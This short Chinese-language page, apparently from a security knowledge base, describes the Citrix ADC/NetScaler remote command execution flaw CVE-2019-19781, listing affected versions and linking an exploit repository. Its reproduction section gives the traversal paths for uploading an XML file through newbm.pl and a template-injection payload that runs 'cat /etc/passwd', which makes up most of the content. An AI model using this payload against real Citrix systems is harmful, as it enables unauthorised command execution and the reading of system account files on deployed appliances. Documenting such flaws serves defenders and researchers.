(CVE-2019-19781)Citrix ADC&NetScaler 远程命令执行漏洞

一、漏洞简介

二、漏洞影响

13.x,12.1,12.0,11.1,10.5

三、复现过程

https://github.com/ianxtianxt/CVE-2019-19781

0x01

upload_xml (/vpn/../vpns/portal/scripts/newbm.pl)

0x02

Execute Command (/vpn/../vpns/portal/jas502n.xml)

Payload:

url=http://example.com&title=c&desc=[% http://template.new('BLOCK' = 'print `cat /etc/passwd`') %]
零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2020-01-11 15:21:30

results matching ""

    No results matching ""